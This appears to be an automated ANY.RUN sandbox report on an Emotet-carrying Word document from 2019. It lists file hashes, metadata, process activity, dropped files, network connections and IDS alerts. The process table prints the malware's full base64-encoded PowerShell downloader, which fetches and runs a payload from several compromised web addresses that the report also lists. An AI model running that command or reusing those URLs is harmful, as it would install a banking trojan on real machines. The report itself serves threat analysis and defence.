analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

XdMOLGXYGfRWgazukFjJgqUGokvVNN

Full analysis: https://app.any.run/tasks/f448007f-3dfe-47f4-9e7b-94b9d384bda6
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 19:04:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Knoll, Subject: Rubber, Author: Daryl Kiehn, Keywords: Fields, Comments: Rubber, Template: Normal.dotm, Last Saved By: Bryce Harber, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

40C18DFA04993A800F3F756EF78C29FC

SHA1:

1929B2712A81C2377F9D2832FBDCC5EFBC8F18EA

SHA256:

8FD04CE2418FC4BAF9EBDE360FA250CBAFAD34DD67DEA5AFE4F317779679DFF2

SSDEEP:

6144:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46dis:ZRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRd9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3052)
    • Executed via WMI

      • powershell.exe (PID: 3052)
    • PowerShell script executed

      • powershell.exe (PID: 3052)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2908)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Schroeder
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 205
Paragraphs: 1
Lines: 1
Company: Grant Group
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 176
Words: 30
Pages: 1
ModifyDate: 2019:10:09 16:49:00
CreateDate: 2019:10:09 16:49:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Bryce Harber
Template: Normal.dotm
Comments: Rubber
Keywords: Fields
Author: Daryl Kiehn
Subject: Rubber
Title: Knoll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\XdMOLGXYGfRWgazukFjJgqUGokvVNN.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3052powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEANgA1AGIAOAAwADAANAAyADAAPQAnAGMAMgA1AGIANwAwADcANgA4AGMAOAAnADsAJAB4ADMAeABjADkAOQA1ADQAOAAwAHgAIAA9ACAAJwAyADQAOQAnADsAJAB4ADUANQAxADEANwAwADcANwA2ADUAYgA9ACcAYgA4AHgAMQBiADgAMABjADAANwAyADIAMAAnADsAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAAzAHgAYwA5ADkANQA0ADgAMAB4ACsAJwAuAGUAeABlACcAOwAkAHgAMAAxAGMAMgAwADQAMABiADYANQA9ACcAYwAwADgANQAyADAAYwAwAGIANABjACcAOwAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAQwBMAGkARQBOAHQAOwAkAGIAMABjADAAOQA5ADIAMAA2ADQAeAAxADAAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG8AcAByAGUAdAB0AHkAaABhAGkAcgBsAGwAYwAuAGMAbwBtAC8AdwBlAGwAYwBvAG0AZQAyAC8AaQByAGMAWQBkAGoAZQB3AFAAdAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AegBoAGkAegBhAGkAcwBpAGYAYQBuAGcALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAGYAZQBuAGMAZQAvAGQATABqAFAAVAB6AHkAbAAvAEAAaAB0AHQAcAA6AC8ALwBmAHUAdAB1AHIAZQAtAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEQARABiAFYAYwBMAFAAdgB6AC8AQABoAHQAdABwAHMAOgAvAC8AaQBtAHQAZwBsAG8AYgBhAGwAcwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA1ADMAZQBmADAAdQA3AGYAbABfADQAeQAzAG0AeABtAGIAMABmAC0ANQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdgBhAHMAdAB1AHYAaQBkAHkAYQBhAHIAYwBoAGkAdABlAGMAdABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBNAFgAUQB4AGcARgBaAEUALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwBAACcAKQA7ACQAYwA2ADAAMAAwADkAMwAzADYANwAxADAAPQAnAGMAOQAwADkANwA1ADcANgAwADAAMAAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAMAAwADAAMQAwADkANgA4ADQAOAAgAGkAbgAgACQAYgAwAGMAMAA5ADkAMgAwADYANAB4ADEAMAApAHsAdAByAHkAewAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgALgAiAGQAbwBXAE4ATABgAG8AYQBgAEQARgBJAGwARQAiACgAJABiADAAMAAwADEAMAA5ADYAOAA0ADgALAAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQA7ACQAYwA2AHgAMAAwAHgAMAB4AGMANwAwAD0AJwB4ADMANAA1AHgAeAAxADIAYwA5ADYAMAAwACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQAuACIATABFAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANgA0ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwApADsAJAB4ADAAOQB4AHgANgBiAGMAYgA1ADAAeAA4AD0AJwBjADgAOAAzADcANgAzADAAMABiAHgAJwA7AGIAcgBlAGEAawA7ACQAYgBiADAAOQAyAGIAeAA3AHgAMAAwADgAMgA9ACcAYgBjAGMANwAzADcAOQBiADEAMAAwADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAHgAOAAyADgAeAA2AGIAMAA3AD0AJwBjADAAMAA4ADMAMwAwADIAMAAwADQANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 369
Read events
895
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4EF8.tmp.cvr
MD5:
SHA256:
3052powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0GOWIRCNGFZGK3CDDXUV.temp
MD5:
SHA256:
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9303A9D.wmfwmf
MD5:1072F06BE6E1D176E71E0052BF0E20D0
SHA256:486EF451450F2D936FA195438807CC0EF804335F85690691B5EBA8B038DB8A7B
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\452EEAAF.wmfwmf
MD5:C67BE3EFE8EFB93BE36C4A417A612093
SHA256:A06C0C8F597584BDC5E59AEEEDE1B5151D9726C97ACB23481E881209A3972033
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$MOLGXYGfRWgazukFjJgqUGokvVNN.docpgc
MD5:F3CBB64365BAD7D6D5385FC0A195FE19
SHA256:F17376694950FBD7779D64AF10B78DD621C7467F6DF8B7D69A61A51B2A00F8A4
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\335883B3.wmfwmf
MD5:74BDE68E29D389104763216CCA513FA3
SHA256:0755F2494EBA3CDFD0617FA5247B73F0AC82A5F8B637E3FF6B3E168EB69C6720
2908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1FDE0F7D27D0DEEB0E01F88352F8A2C8
SHA256:AFCD4A7E9156DE74CA15024ECE1C1AA146506203C4B9F55F79014C0C676AF0BF
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:D84911D9A4ED323A1EA06B6EAA119E13
SHA256:3801DA90160540364396E75E524103453447E22AC66C65FB975A2EC8A8268277
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9904AB39.wmfwmf
MD5:49C5D718F641C17D725BD20C4DE3C461
SHA256:C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C82287FA.wmfwmf
MD5:3A5B765E2D565595E3777151B0A50B80
SHA256:03F7EB60405A0124ED54D7EAEBD7169D8B6C8E7D86703C983F54DD97E9D45371
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3052
powershell.exe
GET
43.255.154.97:80
http://future-maintenance.com/wp-content/DDbVcLPvz/
SG
suspicious
3052
powershell.exe
GET
301
45.56.100.50:80
http://www.soprettyhairllc.com/welcome2/ircYdjewPt/
US
html
162 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3052
powershell.exe
45.56.100.50:80
www.soprettyhairllc.com
Linode, LLC
US
unknown
3052
powershell.exe
45.56.100.50:443
www.soprettyhairllc.com
Linode, LLC
US
unknown
3052
powershell.exe
47.110.40.3:443
www.zhizaisifang.com
CN
unknown
3052
powershell.exe
43.255.154.97:80
future-maintenance.com
GoDaddy.com, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
www.soprettyhairllc.com
  • 45.56.100.50
unknown
www.zhizaisifang.com
  • 47.110.40.3
unknown
future-maintenance.com
  • 43.255.154.97
suspicious

Threats

PID
Process
Class
Message
3052
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3052
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3052
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info